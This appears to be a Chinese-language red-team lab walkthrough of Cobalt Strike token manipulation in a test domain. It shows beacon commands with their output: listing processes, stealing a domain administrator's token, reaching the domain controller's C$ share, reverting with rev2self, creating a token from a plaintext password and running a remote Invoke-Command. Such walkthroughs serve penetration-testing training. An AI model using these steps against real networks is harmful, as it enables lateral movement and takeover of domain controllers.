接下来将对这些命令进行演示,目前有一个 SYSTEM 权限的会话,该会话在 WIN-72A8ERDSF2P 主机下,此时想查看 WIN-P2AASSD1AF1 主机下的文件(WIN-P2AASSD1AF1 主机是 TEAMSSIX 域的域控制器),那么直接运行 dir 会提示拒绝访问。
1 2 3 4 5
beacon> shell dir \\WIN-P2AASSD1AF1\C$ [*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$ [+] host called home, sent: 55 bytes [+] received output: 拒绝访问。
此时,先用 ps 查看一下当前系统进程信息。
1 2 3 4 5 6 7 8 9 10 11
beacon> ps [*] Tasked beacon to list processes [+] host called home, sent: 12 bytes [*] Process List PID PPID Name Arch Session User --- ---- ---- ---- ------- ----- 00 [SystemProcess] 40 System x64 0 NT AUTHORITY\SYSTEM ……内容太多,此处省略…… 3720524 taskhost.exe x64 2 WIN-75F8PRJM4TP\Administrator 4092236 dwm.exe x64 3 TEAMSSIX\Administrator
通过进程信息可以发现 TEAMSSIX 域下的管理员账户此时在当前 SYSTEM 会话的主机上是登录着的,使用 steal_token [pid] 命令窃取 TEAMSSIX\Administrator 账户的令牌
1 2 3 4
beacon> steal_token 4092 [*] Tasked beacon to steal token from PID 4092 [+] host called home, sent: 12 bytes [+] Impersonated TEAMSSIX\administrator
查看一下当前会话 uid
1 2 3 4
beacon> getuid [*] Tasked beacon to get userid [+] host called home, sent: 8 bytes [*] You are TEAMSSIX\administrator (admin)
再次尝试获取域控制器主机下的文件
1 2 3 4 5 6 7 8 9 10 11 12 13
beacon> shell dir \\WIN-P2AASSD1AF1\C$ [*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$ [+] host called home, sent: 55 bytes [+] received output: 驱动器 \\WIN-P2AASSD1AF1\C$ 中的卷没有标签。 卷的序列号是 F269-89A7 \\WIN-P2AASSD1AF1\C$ 的目录 2020/07/1621:24 <DIR> Program Files 2020/07/1621:52 <DIR> Program Files (x86) 2020/07/1723:00 <DIR> Users 2020/07/2600:55 <DIR> Windows 0 个文件 0 字节 4 个目录 28,493,299,712 可用字节
发现可以成功访问了,使用 rev2self 可移除当前窃取的令牌
1 2 3
beacon> rev2self [*] Tasked beacon to revert token [+] host called home, sent: 8 bytes
再次查看 uid 发现变成了原来的 SYSTEM 权限,此时 WIN-P2AASSD1AF1 主机上的文件也拒绝访问了。
1 2 3 4 5 6 7 8 9 10
beacon> getuid [*] Tasked beacon to get userid [+] host called home, sent: 8 bytes [*] You are NT AUTHORITY\SYSTEM (admin)
beacon> shell dir \\WIN-P2AASSD1AF1\C$ [*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$ [+] host called home, sent: 55 bytes [+] received output: 拒绝访问。
beacon> make_token TEAMSSIX\administrator Test111! [*] Tasked beacon to create a token for TEAMSSIX\administrator [+] host called home, sent: 53 bytes [+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell dir \\WIN-P2AASSD1AF1\C$ [*] Tasked beacon to run: dir \\WIN-P2AASSD1AF1\C$ [+] host called home, sent: 55 bytes [+] received output: 驱动器 \\WIN-P2AASSD1AF1\C$ 中的卷没有标签。 卷的序列号是 F269-89A7 \\WIN-P2AASSD1AF1\C$ 的目录 2020/07/1621:24 <DIR> Program Files 2020/07/1621:52 <DIR> Program Files (x86) 2020/07/1723:00 <DIR> Users 2020/07/2600:55 <DIR> Windows 0 个文件 0 字节 4 个目录 28,493,299,712 可用字节 beacon> powershell Invoke-Command-computer WIN-P2AASSD1AF1-ScriptBlock {whoami} [*] Tasked beacon to run: Invoke-Command-computer WIN-P2AASSD1AF1-ScriptBlock {whoami} [+] host called home, sent: 231 bytes [+] received output: teamssix\administrator
当密码输入错误时,执行上面的两个命令就会提示 登录失败: 未知的用户名或错误密码。 同样的使用 rev2self 可除去当前令牌,恢复原来的 SYSTEM 权限。